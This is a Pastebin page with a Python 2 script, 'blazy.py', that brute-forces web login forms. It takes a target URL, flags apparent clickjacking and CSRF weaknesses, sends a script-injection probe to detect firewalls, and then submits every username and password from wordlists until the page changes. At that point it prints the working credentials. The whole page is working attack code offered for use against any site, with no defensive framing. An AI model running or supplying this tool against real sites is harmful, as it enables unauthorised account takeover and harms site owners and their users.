Advertisement
FlyFar

blazy.py

Nov 23rd, 2023
994
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.97 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python2
  2. #Modules
  3. import mechanize
  4. import itertools
  5. import cookielib
  6. import sys
  7. from bs4 import BeautifulSoup
  8. from re import search, findall
  9. from urllib import urlopen
  10. from urllib2 import URLError
  11. #Stuff related to Mechanize browser module
  12. br = mechanize.Browser() #Shortening the call by assigning it to a varaible "br"
  13. # set cookies
  14. cookies = cookielib.LWPCookieJar()
  15. br.set_cookiejar(cookies)
  16. # Mechanize settings
  17. br.set_handle_equiv(True)
  18. br.set_handle_redirect(True)
  19. br.set_handle_referer(True)
  20. br.set_handle_robots(False)
  21. br.set_debug_http(False)
  22. br.set_debug_responses(False)
  23. br.set_debug_redirects(False)
  24. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
  25. br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'),
  26. ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'), ('Accept-Encoding','br')]
  27. # Banner
  28. print """\033[1;37m    ____   _                    
  29.   |  _ \ | |              
  30.   | |_) || |  __ _  ____ _   _
  31.   |  _ < | | / _` ||_  /| | | |
  32.   | |_) || || (_| | / / | |_| |
  33.   |____/ |_| \__,_|/___| \__, |
  34.                           __/ |
  35.    Made with \033[91m<3\033[37m By D3V\033[1;37m   |___/
  36.    \033[0m"""
  37. url = raw_input('\033[1;34m[?]\033[0m Enter target URL: ') #takes input from user
  38. if 'http://' in url:
  39.     pass
  40. elif 'https://' in url:
  41.     url = url.replace('https://', 'http://')
  42. else:
  43.     url = 'http://' + url
  44. try:
  45.     br.open(url, timeout=10.0) #Opens the url
  46. except URLError as e:
  47.     url = 'https://' + url
  48.     br.open(url)
  49. forms = br.forms() #Finds all the forms present in webpage
  50.  
  51. headers = str(urlopen(url).headers.headers).lower() #Fetches headers of webpage
  52. if 'x-frame-options:' not in headers:
  53.     print '\033[1;32m[+]\033[0m Heuristic found a Clickjacking Vulnerability'
  54. if 'cloudflare-nginx' in headers:
  55.     print '\033[1;31m[-]\033[0m Target is protected by Cloudflare'
  56. data = br.open(url).read() #Reads the response
  57. if 'type="hidden"' not in data:
  58.     print '\033[1;32m[+]\033[0m Heuristic found a CSRF Vulnerability'
  59.  
  60. soup =  BeautifulSoup(data, 'lxml') #Pareses the response with beuatiful soup
  61. i_title = soup.find('title') #finds the title tag
  62. if i_title != None:
  63.     original = i_title.contents #value of title tag is assigned to 'original'
  64.  
  65. def WAF_detector(): #WAF detection function
  66.     noise = "?=<script>alert()</script>" #a payload which is noisy enough to provoke the WAF
  67.     fuzz = url + noise
  68.     res1 = urlopen(fuzz) #Opens the noise injected payload
  69.     if res1.code == 406 or res1.code == 501: #if the http response code is 406/501
  70.         print"\033[1;31m[-]\033[1;m WAF Detected : Mod_Security"
  71.     elif res1.code == 999: #if the http response code is 999
  72.         print"\033[1;31m[-]\033[1;m WAF Detected : WebKnight"
  73.     elif res1.code == 419: #if the http response code is 419
  74.         print"\033[1;31m[-]\033[1;m WAF Detected : F5 BIG IP"
  75.     elif res1.code == 403: #if the http response code is 403
  76.         print "\033[1;31m[-]\033[1;m Unknown WAF Detected"
  77. WAF_detector()
  78.  
  79. def wordlist_u(lst): #Loads usernames from usernames.txt
  80.     try:
  81.         with open('usernames.txt','r') as f:
  82.             for line in f:
  83.                 final = str(line.replace("\n",""))
  84.                 lst.append(final)
  85.     except IOError:
  86.         print "\033[1;31m[-]\033[1;m Wordlist not found!"
  87.         quit()
  88. def wordlist_p(lst): #Loads passwords from passwords.txt
  89.     try:
  90.         with open('passwords.txt','r') as f:
  91.             for line in f:
  92.                 final = str(line.replace("\n",""))
  93.                 lst.append(final)
  94.     except IOError:
  95.         print"\033[1;31m[-]\033[1;m Wordlist not found!"
  96.         quit()
  97. usernames = []
  98. wordlist_u(usernames)
  99. print '\033[1;97m[>]\033[1;m Usernames loaded: %i'% len(usernames)
  100. passwords = []
  101. wordlist_p(passwords)
  102. print '\033[1;97m[>]\033[1;m Passwords loaded: %i'% + len(passwords)
  103. def find(): #Function for finding forms
  104.     form_number = 0
  105.     for f in forms: #Finds all the forms in the webpage
  106.         data = str(f) #Converts the response recieved to string
  107.         username = search(r'<TextControl\([^<]*=\)>', data) #Searches for fields that accept plain text
  108.  
  109.         if username: #if such field is found
  110.             username = (username.group().split('<TextControl(')[1][:-3]) #Extractst the name of field
  111.             print '\033[1;33m[!]\033[0m Username field: ' + username #prints name of field
  112.             passwd = search(r'<PasswordControl\([^<]*=\)>', data) #Searchs for fields that accept password like text
  113.  
  114.             if passwd: #if such field is found
  115.                 passwd = (passwd.group().split('<PasswordControl(')[1][:-3]) #Extracts the field name
  116.                 print '\033[1;33m[!]\033[0m Password field: ' + passwd #prints name of field
  117.                 select_n = search(r'SelectControl\([^<]*=', data) #checks for other selectable menus in form
  118.  
  119.                 if select_n: #if a menu is found
  120.                     name = (select_n.group().split('(')[1][:-1]) #Extracts the menu name
  121.                     select_o = search(r'SelectControl\([^<]*=[^<]*\)>', data) #select_o is the name of menu
  122.  
  123.                     if select_o: #Proceeds to find options of menu
  124.                         menu = "True" #Sets the menu to be true
  125.                         options = (select_o.group().split('=')[1][:-1]) #Extracts options
  126.                         print '\n\033[1;33m[!]\033[0m A drop down menu detected.'
  127.                         print '\033[1;33m[!]\033[0m Menu name: ' + name #prints menu name
  128.                         print '\033[1;33m[!]\033[0m Options available: ' + options #prints available options
  129.                         option = raw_input('\033[1;34m[?]\033[0m Please Select an option:>> ') #Gets option from user
  130.                         brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
  131.                     else:
  132.                         menu = "False" #No menu is present in the form
  133.                         try:
  134.                             brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
  135.                         except Exception as e:
  136.                             cannotUseBruteForce(username, e)
  137.                             pass                           
  138.                 else:
  139.                     menu = "False" #No menu is present in the form
  140.                     option = "" #Sets option to null
  141.                     name = "" #Sets name to null
  142.                     try:
  143.                         brute(username, passwd, menu, option, name, form_number) #Calls the bruteforce function
  144.                     except Exception as e:
  145.                        cannotUseBruteForce(username, e)
  146.                        pass
  147.             else:
  148.                 form_number = form_number + 1
  149.                 pass
  150.         else:
  151.             form_number = form_number + 1
  152.             pass
  153.     print '\033[1;31m[-]\033[0m No forms found'
  154. def cannotUseBruteForce(username, e):
  155.     print '\r\033[1;31m[!]\033[0m Cannot use brute force with user %s.' % username
  156.     print '\r    [Error: %s]' % e.message  
  157. def brute(username, passwd, menu, option, name, form_number):
  158.     for uname in usernames:
  159.         progress = 1
  160.         print '\033[1;97m[>]\033[1;m Bruteforcing username: %s'% uname
  161.         for password in passwords:
  162.             sys.stdout.write('\r\033[1;97m[>]\033[1;m Passwords tried: %i / %i'% (progress, len(passwords)))
  163.             sys.stdout.flush()
  164.             br.open(url)  
  165.             br.select_form(nr=form_number)
  166.             br.form[username] = uname
  167.             br.form[passwd] = password
  168.             if menu == "False":
  169.                 pass
  170.             elif menu == "True":
  171.                 br.form[name] = [option]
  172.             else:
  173.                 pass
  174.             resp = br.submit()
  175.             data = resp.read()
  176.             data_low = data.lower()
  177.             if 'username or password' in data_low:
  178.                 pass
  179.             else:
  180.                 soup =  BeautifulSoup(data, 'lxml')
  181.                 i_title = soup.find('title')
  182.                 if i_title == None:
  183.                     data = data.lower()
  184.                     if 'logout' in data:
  185.                         print '\n\033[1;32m[+]\033[0m Valid credentials found: '
  186.                         print uname
  187.                         print password
  188.                         quit()
  189.                     else:
  190.                         pass
  191.                 else:
  192.                     injected = i_title.contents
  193.                     if original != injected:
  194.                         print '\n\033[1;32m[+]\033[0m Valid credentials found: '
  195.                         print '\033[1;32mUsername: \033[0m' + uname
  196.                         print '\033[1;32mPassword: \033[0m' + password
  197.                         quit()
  198.                     else:
  199.                         pass
  200.             progress = progress + 1
  201.         print ''
  202.     print '\033[1;31m[-]\033[0m Failed to crack login credentials'
  203.     quit()
  204. find()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement